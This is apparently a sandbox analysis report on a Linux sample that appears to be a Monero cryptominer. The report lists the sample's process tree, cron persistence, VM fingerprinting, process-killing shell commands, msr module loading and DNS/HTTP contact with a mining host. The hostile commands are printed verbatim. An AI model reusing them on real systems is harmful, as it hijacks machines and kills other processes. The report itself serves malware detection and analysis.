Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

07/06/2023, 15:38 UTC

230607-s3e1cach8w 7

07/06/2023, 15:35 UTC

230607-s1gq6acc63 7

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20221111-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20221111-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    07/06/2023, 15:35 UTC

General

  • Target

    1

  • Size

    2.3MB

  • MD5

    fb95fc8c3ed253dec1b08722f1bbf18e

  • SHA1

    d48d6dc76323efa8c0ae799d245a650b9d914c09

  • SHA256

    215293b8bdd0a57497d5cc62421e64bb29334e088578679cbf509d66c7b7dc7e

  • SHA512

    498f68c04f66a4cbcfed7e38f779183b2a7766948def1d159158c2799893ddcfb9a7dc2762c8958d6ae479a62f71edee460ac31a5939aa3c149efe59a987834e

  • SSDEEP

    49152:QM4HMaoo1fdQLCS1ytoWW7b/7GN2PM6jm:94Hp11aChtoB7b/7GYEZ

Malware Config

Signatures

  • Loads a kernel module 1 IoCs

    Loads a Linux kernel module, potentially to achieve persistence

  • Checks CPU configuration 1 TTPs 3 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 7 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Enumerates kernel/hardware configuration 1 TTPs 59 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/1
    /tmp/1
    1⤵
    • Checks CPU configuration
    • Checks hardware identifiers (DMI)
    • Reads CPU attributes
    • Reads hardware information
    • Enumerates kernel/hardware configuration
    • Writes file to tmp directory
    PID:611
    • /bin/sh
      sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
      2⤵
        PID:612
        • /usr/bin/whoami
          whoami
          3⤵
            PID:623
          • /bin/hostname
            hostname
            3⤵
              PID:624
            • /bin/grep
              grep -c "^processor" /proc/cpuinfo
              3⤵
              • Checks CPU configuration
              PID:625
          • /bin/sh
            sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
            2⤵
              PID:641
              • /bin/ps
                ps -A "-ostat,ppid"
                3⤵
                • Reads CPU attributes
                • Reads runtime system information
                PID:642
              • /usr/bin/awk
                awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                3⤵
                  PID:643
                • /usr/bin/id
                  id -u
                  3⤵
                    PID:649
                  • /bin/ps
                    ps x
                    3⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:650
                  • /bin/grep
                    grep /etc/cron
                    3⤵
                      PID:651
                    • /bin/grep
                      grep -v grep
                      3⤵
                        PID:652
                    • /bin/sh
                      sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                      2⤵
                        PID:654
                        • /usr/bin/id
                          id -u
                          3⤵
                            PID:655
                          • /bin/ps
                            ps aux
                            3⤵
                            • Reads CPU attributes
                            • Reads runtime system information
                            PID:656
                          • /bin/grep
                            grep -v grep
                            3⤵
                              PID:657
                            • /bin/grep
                              grep -v -- "-bash[[:space:]]*\$"
                              3⤵
                                PID:658
                              • /bin/grep
                                grep -v /usr/sbin/httpd
                                3⤵
                                  PID:659
                                • /usr/bin/awk
                                  awk "{if(\$3>30.0) print \$2}"
                                  3⤵
                                    PID:660
                                • /bin/sh
                                  sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/1' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/1' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/1\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:662
                                  • /bin/rm
                                    rm -rf /tmp/.cron
                                    3⤵
                                      PID:664
                                    • /usr/bin/crontab
                                      crontab -l
                                      3⤵
                                        PID:665
                                      • /bin/grep
                                        grep -v grep
                                        3⤵
                                          PID:666
                                        • /bin/grep
                                          grep -v /tmp/1
                                          3⤵
                                            PID:667
                                          • /usr/bin/crontab
                                            crontab /tmp/.cron
                                            3⤵
                                            • Creates/modifies Cron job
                                            PID:675
                                          • /bin/rm
                                            rm -rf /tmp/.cron
                                            3⤵
                                              PID:676
                                          • /bin/sh
                                            sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
                                            2⤵
                                              PID:677
                                              • /usr/bin/id
                                                id -u
                                                3⤵
                                                  PID:678
                                            • /bin/hostname
                                              hostname -I
                                              1⤵
                                                PID:615
                                              • /usr/bin/awk
                                                awk "{print \$1}"
                                                1⤵
                                                  PID:617
                                                • /bin/cat
                                                  cat /etc/ssh/sshd_config
                                                  1⤵
                                                    PID:619
                                                  • /bin/grep
                                                    grep "Port "
                                                    1⤵
                                                      PID:620
                                                    • /usr/bin/head
                                                      head -n 1
                                                      1⤵
                                                        PID:621
                                                      • /usr/bin/awk
                                                        awk "{print \"-\"\$2}"
                                                        1⤵
                                                          PID:622
                                                        • /bin/grep
                                                          grep -m 1 "model name" /proc/cpuinfo
                                                          1⤵
                                                          • Checks CPU configuration
                                                          PID:628
                                                        • /usr/bin/cut
                                                          cut -d: -f2
                                                          1⤵
                                                            PID:629
                                                          • /bin/sed
                                                            sed -e "s/^ *//"
                                                            1⤵
                                                            • Reads runtime system information
                                                            PID:630
                                                          • /bin/sed
                                                            sed -e "s/\$//"
                                                            1⤵
                                                              PID:631
                                                            • /usr/bin/awk
                                                              awk "{print \$1}"
                                                              1⤵
                                                                PID:634
                                                              • /usr/bin/awk
                                                                awk "{print \$4}"
                                                                1⤵
                                                                  PID:637
                                                                • /usr/bin/awk
                                                                  awk "{print \$4}"
                                                                  1⤵
                                                                    PID:640
                                                                  • /usr/bin/crontab
                                                                    crontab -l
                                                                    1⤵
                                                                      PID:669
                                                                    • /bin/grep
                                                                      grep -v grep
                                                                      1⤵
                                                                        PID:670
                                                                      • /bin/grep
                                                                        grep "/tmp/1\$"
                                                                        1⤵
                                                                          PID:671
                                                                        • /usr/bin/sort
                                                                          sort
                                                                          1⤵
                                                                            PID:672
                                                                          • /usr/bin/uniq
                                                                            uniq
                                                                            1⤵
                                                                              PID:673
                                                                            • /usr/bin/wc
                                                                              wc -l
                                                                              1⤵
                                                                                PID:674
                                                                              • /bin/ps
                                                                                ps aux
                                                                                1⤵
                                                                                • Reads CPU attributes
                                                                                • Reads runtime system information
                                                                                PID:680
                                                                              • /bin/grep
                                                                                grep -v grep
                                                                                1⤵
                                                                                  PID:681
                                                                                • /bin/grep
                                                                                  grep -- "-bash[[:space:]]*\$"
                                                                                  1⤵
                                                                                    PID:682
                                                                                  • /usr/bin/awk
                                                                                    awk "{if(\$3>30.0) print \$2}"
                                                                                    1⤵
                                                                                      PID:683
                                                                                    • /usr/bin/wc
                                                                                      wc -l
                                                                                      1⤵
                                                                                        PID:684
                                                                                      • /bin/sh
                                                                                        sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
                                                                                        1⤵
                                                                                          PID:691
                                                                                          • /sbin/modprobe
                                                                                            /sbin/modprobe msr "allow_writes=on"
                                                                                            2⤵
                                                                                            • Enumerates kernel/hardware configuration
                                                                                            PID:692

                                                                                        Network

                                                                                        • flag-us
                                                                                          DNS
                                                                                          xmr-rx0.pwndns.pw
                                                                                          Remote address:
                                                                                          1.1.1.1:53
                                                                                          Request
                                                                                          xmr-rx0.pwndns.pw
                                                                                          IN A
                                                                                          Response
                                                                                          xmr-rx0.pwndns.pw
                                                                                          IN A
                                                                                          134.209.222.172
                                                                                          xmr-rx0.pwndns.pw
                                                                                          IN A
                                                                                          51.210.15.231
                                                                                          xmr-rx0.pwndns.pw
                                                                                          IN A
                                                                                          104.248.18.85
                                                                                        • flag-us
                                                                                          DNS
                                                                                          xmr-rx0.pwndns.pw
                                                                                          Remote address:
                                                                                          1.1.1.1:53
                                                                                          Request
                                                                                          xmr-rx0.pwndns.pw
                                                                                          IN AAAA
                                                                                          Response
                                                                                        • 104.248.18.85:80
                                                                                          xmr-rx0.pwndns.pw
                                                                                          http
                                                                                          4.5kB
                                                                                          4.9kB
                                                                                          33
                                                                                          21
                                                                                        • 1.1.1.1:53
                                                                                          xmr-rx0.pwndns.pw
                                                                                          dns
                                                                                          74 B
                                                                                          122 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          xmr-rx0.pwndns.pw

                                                                                          DNS Response

                                                                                          134.209.222.172
                                                                                          51.210.15.231
                                                                                          104.248.18.85

                                                                                        • 1.1.1.1:53
                                                                                          xmr-rx0.pwndns.pw
                                                                                          dns
                                                                                          74 B
                                                                                          137 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          xmr-rx0.pwndns.pw

                                                                                        MITRE ATT&CK Enterprise v6

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • /tmp/.cron

                                                                                          Filesize

                                                                                          22B

                                                                                          MD5

                                                                                          0c846569fad0c790b8a218e5ed420694

                                                                                          SHA1

                                                                                          ee8cfcde03a4fd38e1e6fbe7d0e3fd4c9aa18748

                                                                                          SHA256

                                                                                          2f03f23bb049d1ff68b15611e1ad1ee89c93a472a025fd748eb592dd31560cb4

                                                                                          SHA512

                                                                                          3b59ac36c4d688fe9bfc64d3a52db4c5e8b9443344be4d42d51717c92932a56117215ce3975fd2df60f4fcb9910c81f05bfc18a4762359d31fed089b090cc7bd

                                                                                        • /var/spool/cron/crontabs/tmp.paFbJV

                                                                                          Filesize

                                                                                          206B

                                                                                          MD5

                                                                                          c36d9e4ea0b13afb4c9a633a7b447d24

                                                                                          SHA1

                                                                                          74e7773d4b15480f3ebb1bb738016d54ec3a277a

                                                                                          SHA256

                                                                                          66bf9da2326637a3feacd0bdecb2557a510029b29c82c57f3f0d08b3c3323de7

                                                                                          SHA512

                                                                                          d7e4a9dc000974287d1ee87ac5e663333816e8536b9d6f7dd6acd9859a88ff4562a67f1a292fa538938e897e755dd2dac41780c945a7730141de4fbfc409ab25

                                                                                        We care about your privacy.

                                                                                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.